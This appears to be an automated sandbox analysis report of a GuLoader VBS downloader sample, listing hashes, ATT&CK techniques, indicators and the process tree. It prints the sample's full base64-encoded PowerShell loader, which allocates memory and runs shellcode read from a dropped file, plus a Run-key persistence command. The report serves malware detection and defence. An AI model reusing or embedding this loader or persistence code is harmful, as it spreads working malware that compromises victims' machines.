guloader | 3488a33e978dbb1cfb03897e5d717a0a116e8ec7aa4c237ae96892081e236c40

Analysis

max time kernel
150s
max time network
150s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
29-12-2024 05:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

JaffaCakes118_3488a33e978dbb1cfb03897e5d717a0a116e8ec7aa4c237ae96892081e236c40.vbs
Size

91KB
MD5

151e6b10a9fc5d46ef2fe47db9341299
SHA1

d45038f32b1c203004eb68dbcccb292329707314
SHA256

3488a33e978dbb1cfb03897e5d717a0a116e8ec7aa4c237ae96892081e236c40
SHA512

079660de624f04ce8d33c846e03f79c333adb038f0aacd3a22622d758fbb82ac7d50a6a6d09dfa52b8ce45b29863379b1c846525cdb1bec42edc06f668ed3382
SSDEEP

1536:6i/+uE7ixfTxj7/agTmpC5+MkpMBoCROhmIKyjr18mYFmSbm7wYsdtcwGLZXnzcP:vGB7ilT1/hoFpcRIKyP18mEbwaVihnzG

Score

10^/10

guloader defense_evasion discovery downloader persistence

Malware Config

Signatures

Guloader family
guloader
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Checks QEMU agent file 2 TTPs 2 IoCs

Checks presence of QEMU agent, possibly to detect virtualization.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	powershell.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	ieinstal.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows\CurrentVersion\Run\Aargangsv = "%TORO% -w 1 $Oraclepa=(Get-ItemProperty -Path 'HKCU:\\SOFTWARE\\AppDataLow\\').Slusevrks;%TORO% -encodedcommand($Oraclepa)"	ieinstal.exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2244	powershell.exe
2680	ieinstal.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2244 set thread context of 2680	2244	powershell.exe	38

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ieinstal.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2244	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2244	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2244	powershell.exe

Suspicious use of WriteProcessMemory 31 IoCs

description	pid	Process	procid_target
PID 2520 wrote to memory of 2404	2520	WScript.exe	30
PID 2520 wrote to memory of 2404	2520	WScript.exe	30
PID 2520 wrote to memory of 2404	2520	WScript.exe	30
PID 2520 wrote to memory of 2244	2520	WScript.exe	32
PID 2520 wrote to memory of 2244	2520	WScript.exe	32
PID 2520 wrote to memory of 2244	2520	WScript.exe	32
PID 2520 wrote to memory of 2244	2520	WScript.exe	32
PID 2244 wrote to memory of 1920	2244	powershell.exe	34
PID 2244 wrote to memory of 1920	2244	powershell.exe	34
PID 2244 wrote to memory of 1920	2244	powershell.exe	34
PID 2244 wrote to memory of 1920	2244	powershell.exe	34
PID 1920 wrote to memory of 2944	1920	csc.exe	35
PID 1920 wrote to memory of 2944	1920	csc.exe	35
PID 1920 wrote to memory of 2944	1920	csc.exe	35
PID 1920 wrote to memory of 2944	1920	csc.exe	35
PID 2244 wrote to memory of 2940	2244	powershell.exe	36
PID 2244 wrote to memory of 2940	2244	powershell.exe	36
PID 2244 wrote to memory of 2940	2244	powershell.exe	36
PID 2244 wrote to memory of 2940	2244	powershell.exe	36
PID 2940 wrote to memory of 2840	2940	csc.exe	37
PID 2940 wrote to memory of 2840	2940	csc.exe	37
PID 2940 wrote to memory of 2840	2940	csc.exe	37
PID 2940 wrote to memory of 2840	2940	csc.exe	37
PID 2244 wrote to memory of 2680	2244	powershell.exe	38
PID 2244 wrote to memory of 2680	2244	powershell.exe	38
PID 2244 wrote to memory of 2680	2244	powershell.exe	38
PID 2244 wrote to memory of 2680	2244	powershell.exe	38
PID 2244 wrote to memory of 2680	2244	powershell.exe	38
PID 2244 wrote to memory of 2680	2244	powershell.exe	38
PID 2244 wrote to memory of 2680	2244	powershell.exe	38
PID 2244 wrote to memory of 2680	2244	powershell.exe	38

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_3488a33e978dbb1cfb03897e5d717a0a116e8ec7aa4c237ae96892081e236c40.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2520
- C:\Windows\System32\cmd.exe
  cmd /c ECHO powershell.exe
  2⤵
  PID:2404
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "IwBFAHQAaABlAHIAIABHAGkAZgB0AGUAcgAgAEgAZABiAGsAbgBlAGQAIABGAG8AZABlAHIAcwAgAGoAdQByAHkAZQBuAGEAZAByACAAUgBlAHMAaQAgAEoAZQBuAGwAYQAgAEUAawBzAGUAawB2AGUAcgBlAGQAIABBAHAAbwBsAG8AIABTAHAAZwBlAGwAcwBlAHMAYQAgAGcAbwBkAHQAZwByACAAUwBnAGUAcAByAG8AYwBlAGQAIABTAHQAbwByAGYAeQByACAAUQB1AGEAcwBpAGMAbwAgAEUAbABlAGMAdAByAG8AcABoACAAQQBmAHAAYQB0AHIAIABTAGkAawBrAGUAcgBoACAAQQBuAGUAcwAgAEcAYQBmAGYAZQBsAHMAZQBqAGwAIABEAGkAcwBjAGwAYQBpAG0AZQAgAEEAdgBhAG4AYwBlACAASwBvAG4AZwBlAGwAbwB2AGUAbgAgAHMAdQBiAG8AcgBkACAAUgBhAGQAaQAgAEwAaQB2AGUAcwB0AGYAIABCAGkAegBhAHIAcgBlAHIAaQAgAEQAcgBlAGoAZQBmACAAVABpAGQAcwBmAHMAdABoAHYAbAAgAA0ACgANAAoAJABpAEsARgAgAD0AIAAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIALAAgAEUAbgB0AHIAeQBQAG8AaQBuAHQAPQAiAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFMAdABvAGMAYQB6AHoAbwAoAGkAbgB0ACAATQBhAGQAbgBpAG4AZwBwAHIANgAsAHIAZQBmACAASQBuAHQAMwAyACAAZgBsAGUAdAB2AHIALABpAG4AdAAgAEYAbABqAGEALAByAGUAZgAgAEkAbgB0ADMAMgAgAE0AYQBkAG4AaQBuAGcAcAByACwAaQBuAHQAIABQAGEAYwBlAHcAYQB5ACwAaQBuAHQAIABNAGEAZABuAGkAbgBnAHAAcgA3ACkAOwAnADsADQAKACQAUABhAGMAZQB3AGEAeQAwACAAPQAgACIAVwBpAG4AMwAyACIADQAKACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAGkASwBGACAALQBOAGEAbQBlACAAJABQAGEAYwBlAHcAYQB5ADAAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwANAAoADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAATQBhAGQAbgBpAG4AZwBwAHIAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAE0AbwBkAGUALAB1AGkAbgB0ACAAUwB0AGUAcgBpACwAaQBuAHQAIABvAHAAZgBpAG4AZABlAGwAcwAsAGkAbgB0ACAATQBhAGQAbgBpAG4AZwBwAHIAMAAsAGkAbgB0ACAAVAByAGkAbQBzAHQAbwBuAGUAdQAsAGkAbgB0ACAAVAB1AHIAYgBvAGoAZQB0ACwAaQBuAHQAIABzAHUAbgBkAGgAZQApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAUgBlAGEAZABGAGkAbABlACgAaQBuAHQAIABGAGwAagBhADAALAB1AGkAbgB0ACAARgBsAGoAYQAxACwASQBuAHQAUAB0AHIAIABGAGwAagBhADIALAByAGUAZgAgAEkAbgB0ADMAMgAgAEYAbABqAGEAMwAsAGkAbgB0ACAARgBsAGoAYQA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABGAGwAagBhADUALABpAG4AdAAgAEYAbABqAGEANgAsAGkAbgB0ACAARgBsAGoAYQA3ACwAaQBuAHQAIABGAGwAagBhADgALABpAG4AdAAgAEYAbABqAGEAOQApADsADQAKAH0ADQAKACIAQAANAAoAIwBPAGsAdABhAHYAZQByAHMAdQBuACAAQwBvAG4AZAB5AGwAbwBzAGgAagAgAEEAbgBnAGwAZQBkACAAVQBuAGgAbwBvAGQAaQBuAGcAdAAgAEoAZQBuAGIAcgB5AG4AIABBAGwAZABlAHIAbQBhAG4AZQBzACAAQwBvAGEAcwB0ACAAUwBpAGQAZAAgAEcAbABvAG0AZQByAGEAIABGAG8AcgBoAGEAbgBkAGwAaQAgAFAAdQBtAHAAZQAgAE8AdABoAGUAbABsAG8AawBhACAAVABhAGIAZQBsAG8AdgBlAHIAbAAgAFAAbwBzAHQAZQByAG8AbABhAHQAIABCAGUAcABhAGsAawBlAGQAZQBzACAAVAB2AGUAawAgAGEAdQBrAHMAIABQAGgAYQBjAG8AcABpAGQAZABlACAASABlAGsAcwBlAGsAdQBuAHMAdAAgAGYAaQBuAHQAbQBhAHMAawBlACAAYQBsAHUAbgByACAATQBhAGwAZQBlAHMAeQBtAGYAbwAgAEgAagBsAHAAZQBmACAAVwBlAGsAZQAgAFUAZABmAHIAaQBlAG4AZAAgAFkAZABlAHIAawAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAUwB0AHkAawBzAGEAIgAgAA0ACgAkAE0AYQBkAG4AaQBuAGcAcAByADIAPQAiACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACIAIAArACAAIgBcAEYAbABnAGEAcgB0AGkAZgAuAGQAYQB0ACIADQAKACMAUABhAHIAdABsAGUAdAAgAEoAdQB2AGUAbAByAGwAIABLAGoAZQByAGUAcwB0ACAARABlAHYAbwB0AGkAbwBuACAATgBlAHUAdAByAGEAbABpACAAdgBhAGcAYgBvACAAVQBuAGQAZQByAGgAbwBsACAAUwBvAHIAdABhACAAUwBvAHIAdABhACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBGAHIAYQB4AGUAdABpAG4AcwBpACIAIAANAAoAJABNAGEAZABuAGkAbgBnAHAAcgAzAD0AMAA7AA0ACgAkAE0AYQBkAG4AaQBuAGcAcAByADkAPQAxADAANAA4ADUANwA2ADsADQAKAA0ACgANAAoAJABNAGEAZABuAGkAbgBnAHAAcgA4AD0AJAB3ADoAOgBTAHQAbwBjAGEAegB6AG8AKAAtADEALABbAHIAZQBmAF0AJABNAGEAZABuAGkAbgBnAHAAcgAzACwAMAAsAFsAcgBlAGYAXQAkAE0AYQBkAG4AaQBuAGcAcAByADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAIwBDAGkAZABlACAASgB1AHIAeQBtAGUAZAAgAEYAeQBsAGQAZQBrAGEAIABTAHQAYQB0AHMAcwBrAGEAIABUAHIAaQBwAGkAbgAgAEMAcgBvAHMAaABhAGIAIABMAGUAaQBzACAAUABlAHIAcwBvAG4AIABHAG4AbwBzACAARQBtAGEAYwBpACAAQgBsAHUAbQBlAGkAbgBkACAAUwBhAG0AbQAgAFAAbwBsAHkAZQAgAFUAbAB2AGUAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFMAdQBwAG8AIgAgAA0ACgAkAE0AYQBkAG4AaQBuAGcAcAByADQAPQBbAE0AYQBkAG4AaQBuAGcAcAByADEAXQA6ADoAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAJABNAGEAZABuAGkAbgBnAHAAcgAyACwAMgAxADQANwA0ADgAMwA2ADQAOAAsADEALAAwACwAMwAsADEAMgA4ACwAMAApAA0ACgAjAEsAbABlAGIAaQAgAEEAbgB0AGkAawAgAEsAcgBpAHQAaQBrAHAAdQBuAGsAIABNAHUAbAB0AGkAcwB1AGwAYwAgAFQAbwB0AGEAbAAgAEQAZQBtAG8AbAAgAEUAZwBvAGMAZQAgAFIAaABhAGIAZABvAHMAZgAgAHMAYQBuAGQAcwAgAEQAaQBnAG8AbgBhACAATgBlAGEAdABlAG4AYgBpAGIAIABVAG4AbwBiAGwAaQBnAGUAZAAgAEEAZgBzAHAAbgAgAEIAbwByAGcAIAB0AGoAYQB2AHMAZQBkAGUAawBhACAAVQBuAGQAaQBzAG8AYgBsAGkAZwAgAFIAZQBnAHUAIABEAGEAbQBlAGIAZQBrACAAUwBrAG4AaABlAGQAZQByAG4AZQAgAEgAagBlAG0AZwBpAHYAZQAgAGQAZQBmAGwAbwByACAAVQBiAGUAbABhAHMAdAAgAEEAZwB0AHYAcgAgAFAAcwBlAHUAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFAAaQBmAHQAZQByAHMAdQBzACIAIAANAAoAJABNAGEAZABuAGkAbgBnAHAAcgA1AD0AMAA7AA0ACgAjAEQAcgBpAHYAaAB1AHMAcAAgAEgAZQBhAGQAIABDAGgAcgBvAG0AbwBwACAARgBvAHIAZgByAHkAcwBuACAAUwBwAHkAZABrAGEAcwAgAEkAbgBkAHIAZQB0AG4AaQBuAGcAIABUAGUAcgBtAHcAaQBzAGUAcAAgAE0AZQBhAHMAbABlAGQAbgBlACAAbgBpAHQAcgBpACAARQB2AGUAbgB0AHkAcgBlAHIAZQAgAFMAdQBzAGEAbgBlAGUAbQBvACAAUQB1AGEAcgB0AGUAIABOAG8AbgBjAG8AbgAgAFUAbgB0AHIAaQBhACAARgBvAHIAcwBrACAASwBvAG0AbQBhAG4AIABFAGYAdABlAHIAcwBpACAAQQByAGMAaABpACAAUwBlAG0AaQBjAHIAIABXAGEAeQBiAGUAcgByAHkAcwAgAEkAbgBzAG8AZgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAUgBlAGIAYQByAGIAYQB0ACIAIAANAAoAWwBNAGEAZABuAGkAbgBnAHAAcgAxAF0AOgA6AFIAZQBhAGQARgBpAGwAZQAoACQATQBhAGQAbgBpAG4AZwBwAHIANAAsACQATQBhAGQAbgBpAG4AZwBwAHIAMwAsADIAOQA3ADgAMwAsAFsAcgBlAGYAXQAkAE0AYQBkAG4AaQBuAGcAcAByADUALAAwACkADQAKACMAVAByAG8AbABkACAARgB1AG4AaQBjAHUAbAAgAE8AcABzAGsAcgB1AG4AIAB3AGEAcwBwAGkAbgBlAHMAcwBiACAARABvAHcAbgBzAGgAaQBmACAARgByAHkAdABsAGUAcwBmAG8AcgAgAEgAbgBnAGUAYgByACAAUwBjAGgAbwAgAFAAZQBuAHQAYQBjACAAVABpAGwAcwB0AHIAYgBlAGwAIABBAHYAZQBzAHQAYQBuAGMAIABQAGEAbgBlAGcAIABWAGkAcgBrAGUAbABpACAAUgBvAG8AdAB3AG8AcgBtAG8AIABDAG8AbQBwAG8AbgBlAG4AdABpACAAUgBvAGMAaABlACAAcwBsAGEAbgAgAEoAYQBrAHUAbgBoAG8AdgBlAGQAIABCAHIAbgBkAGUAbgB1ACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBVAG4AcABpAGwAbABhAGcAZQBkACIAIAANAAoAWwBNAGEAZABuAGkAbgBnAHAAcgAxAF0AOgA6AEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAJABNAGEAZABuAGkAbgBnAHAAcgAzACwAIAAwACwAMAAsADAALAAwACkADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBSAGUAbQBhAG4AZABtACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEIAZQBsAHkAcwBuAGkAbgBnACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFAAdQByAGkAZgBpAGUAcgBuACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEIAZQBrAGUAbgAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBGAHIAaQBnAGgAdABhAGIAbABlACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAGgAaQBqAGEAYwBrAGUAcgB1AG4AIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAUwB0AGEAcgB0ACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFMAaAB1AGQAZABlAHIAaQBuAGcAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAYgBvAHMAdABhAGwAcgBlAHAAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIATQB1AHMAagBpAGQAbQBpAG4AYQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBOAHUAbQBtAGUAcgBpAG4AdAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBTAHUAcABlACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEEAYQByAGUAbABhAGQAZQAiACAADQAKAA=="
  2⤵
  - Checks QEMU agent file
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2244
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\krcicdmv.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1920
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES954E.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC954D.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2944
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jo5gcvlf.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2940
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9676.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC9675.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2840
- - C:\Program Files (x86)\internet explorer\ieinstal.exe
    "C:\Program Files (x86)\internet explorer\ieinstal.exe"
    3⤵
    - Checks QEMU agent file
    - Adds Run key to start application
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    PID:2680

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES954E.tmp

Filesize
1KB

MD5
f05168d1621fefd01e97d784544269b6

SHA1
1b922ef8df945b88244402024ac96b1d1d30c393

SHA256
d7137432dd311c4a99a906873a3710f4b723af7c07b515e54c3d4f39081639e0

SHA512
e891bff4361addbfd741b191321802136358eefac2ab4faffee8a412df30ec13c1819e46c0eda34785f4ad82378bda12a68db6cb82c17ac5381d7c39e4a3fdf2

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES9676.tmp

Filesize
1KB

MD5
804ca09b0d49de4aad4001ae72df8b2e

SHA1
9f005e63db5eae13acfd887cfc9bbf289a8eee31

SHA256
76e2ea64ec5264cd47e99b59d143370a9b2942f64de660db1e0fcbbe4af6067b

SHA512
32204e5dccb0d69f564b28199c32991a933b3893579496bff86a925bdafe9bfa8739ef48d75f4d8d8fa9965de290e7c66ca788b008637f4f1b693b995cb52dce

Download Submit
C:\Users\Admin\AppData\Local\Temp\jo5gcvlf.dll

Filesize
3KB

MD5
a75783625668704e5681871fad329b4e

SHA1
c6ccbeab693ed3f2a28dcefc008f7ce6b0ca310c

SHA256
2573a242bc78f22a9e1afb7e9cbfcf93af6e54b004d7224eec936c4b39db73fc

SHA512
045c5c0fe51722284d4d10ace7a562c9be731746bba634cfc14743912df4d81404a73af92f55fde79dfec81ce691765a2dfe7cbfb53bb0e362b2c73e767c4a09

Download Submit
C:\Users\Admin\AppData\Local\Temp\jo5gcvlf.pdb

Filesize
7KB

MD5
31f13b30ffacb745eff9f1f134e2e1ee

SHA1
b2eb8b3266d360d889f7751cdfb935a06d2689cc

SHA256
ddfcc66a82c9e58667bb8623681b4fed1f67a90891ad31a5ea320bae10f05ec5

SHA512
d3a04a076ac6776225e6370e6a4c2df34b245834caa8b836675eb8775300881dc5f9c561dc36bdb20825a5c48504ec90974795d47a3e4f68d69968a32f64912a

Download Submit
C:\Users\Admin\AppData\Local\Temp\krcicdmv.dll

Filesize
3KB

MD5
13b7f1d2be9446c285f594ec7aebc4bb

SHA1
3a0e8f02c4487051f4476b7cc4e4b644b04df68c

SHA256
fbe524e09b0a2fa900e03dafc19130752e9e2e88397818d76d706f94f4d954c0

SHA512
c1cf6b02f4ab7afc82bf82d43097951e4ace1b6d1e55b468bd8800b19995bf98c860f9ed376e49c59c7923294209393dd0329b918d5cdc41f958a10ae1d9dae2

Download Submit
C:\Users\Admin\AppData\Local\Temp\krcicdmv.pdb

Filesize
7KB

MD5
bdcbeaeeea839170c5d505c085ee749d

SHA1
85393697a3d5faad225a2ea46def6b3b963ce912

SHA256
73de1147eb27398993db4585bd6cbfb7939efb05e4d6ee53abcb0762f4b84bed

SHA512
85cb44ff0465ee004d975f123e2af31a437508e8fa8beaf09914517f6d1613abe858154443af1eb0033e198aa3ea19a2b66411847755a4b63d897def6e2b26f2

Download Submit
C:\Users\Admin\AppData\Roaming\Flgartif.dat

Filesize
29KB

MD5
6a44848f3d6612e8dcf87e2412938989

SHA1
ca4e8e5f9a48274285ef5f45687c1b3abe19615b

SHA256
e84b3029900d2a23252863017a60e42cd3a543ff8963a95ff0d9ada2ca4449b0

SHA512
62604b5c148e7775abd9443b22004ac7fd9fea3a5ab68ed2f48c18ee02871282b735f00fec995c8c4df178ba73834e8fad8ed4b01121f5c8ff4435a752aaf64f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC954D.tmp

Filesize
652B

MD5
48a84446367c41b4040aaf3afe5b9adb

SHA1
b8ade55ae24cb5f4acc81febaa5617f6be04c1cd

SHA256
355ca6cabc9be57b9445d93d0189ad53dd14bed4e28ecdae4e96e62d8a28bd71

SHA512
288b3a7afae7e03a6b0fce4b0f2b380747ce49b76b120bbc5aaecb4c26f0e0d1b8c810985825230ef125f5c486cb16f8611639a20ad86a466c764b3d4d4e3ddc

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC9675.tmp

Filesize
652B

MD5
3912114cc406e62a7152e84634b8cdce

SHA1
94a0a416a74b155f8ec38c6c7e108f1a0f4a06bd

SHA256
153941d49361e3dcb9522a3aae6a68b35131cea1820d635e3f6cd7af5a028e6f

SHA512
cd83f4339691b4c69fe35ed784cd2b551385b1a8978fac97997e02b886675ed92a798367a142597e74abd21d8db41d7effd9475a756aa4904d88767cfaac8b22

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\jo5gcvlf.0.cs

Filesize
503B

MD5
ef368eb363272e6d4ea5b1859e789fe6

SHA1
0f69004d7b24f3c1f2b0faa219105cce6f9dbc8e

SHA256
9de8875ab310a4cf0640d5cfeda93c83c6684df4fae40e5da036009734086a59

SHA512
0db4930e4f9e4685bfdab1c5f2e7923012f27ee6de7630e989ea0069b6b561be01d8b008cad5f50233c5900e64646d18976389f234817af8ab077b0dc86c44d4

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\jo5gcvlf.cmdline

Filesize
309B

MD5
efa6f6b1e55a14e514def51ae378bbfd

SHA1
ed63e99adabf23b53b87e3e23b34b9f02b00976b

SHA256
68cdc9d19e52bb19c1540631347a88edf6dfdbbd600bb729df3db389fc4e3a38

SHA512
f72b2d9dd42e5f84678d798fc25513a99edbb1564ba613c3bec93482e705b669505202ce1b1cd55862802cfd0eeefc34b2fe14812b805daf97e46d78d3454514

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\krcicdmv.0.cs

Filesize
312B

MD5
1f5f578f802a7fdec720af4972875e7c

SHA1
ededcc25c3e56d7892b094d989114514d3d56fc2

SHA256
bef779b96488d834f2dca6fb5ca98f41471ebdc48051c984af33cf126a238b46

SHA512
240b8ad8a78c42779d138f370ff91151ac68cdf60fa946b7123641e82eb2b467a82db990efdbfe684f397280bce07462e9f966bd1b91e46176e5c50e05f2d3e4

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\krcicdmv.cmdline

Filesize
309B

MD5
4d67eff37a9445e9ec3abed7eb3ef655

SHA1
9956df6989f88c3afd860f95dbfabdf4be51c47c

SHA256
000f3e845034b6e0ae6999bd355b99908ac7211a6929060968cf3299da4e44ba

SHA512
07ca633ca8526b9dd25b91921bdea55185218ad9a03acd061b43a79ac6bcaba22a9c73e9997f0ecc6fb4d1fc11b9e5084a1b39b85f791a31babfdfe5d150b60c

Download Submit
memory/2244-4-0x0000000074270000-0x000000007481B000-memory.dmp

Filesize
5.7MB

Download
memory/2244-5-0x0000000074270000-0x000000007481B000-memory.dmp

Filesize
5.7MB

Download
memory/2244-7-0x0000000074270000-0x000000007481B000-memory.dmp

Filesize
5.7MB

Download
memory/2244-6-0x0000000074270000-0x000000007481B000-memory.dmp

Filesize
5.7MB

Download
memory/2244-3-0x0000000074271000-0x0000000074272000-memory.dmp

Filesize
4KB

Download
memory/2244-40-0x0000000074270000-0x000000007481B000-memory.dmp

Filesize
5.7MB

Download
memory/2680-39-0x00000000002D0000-0x00000000003D0000-memory.dmp

Filesize
1024KB

Download
memory/2680-41-0x0000000000400000-0x0000000000615000-memory.dmp

Filesize
2.1MB

Download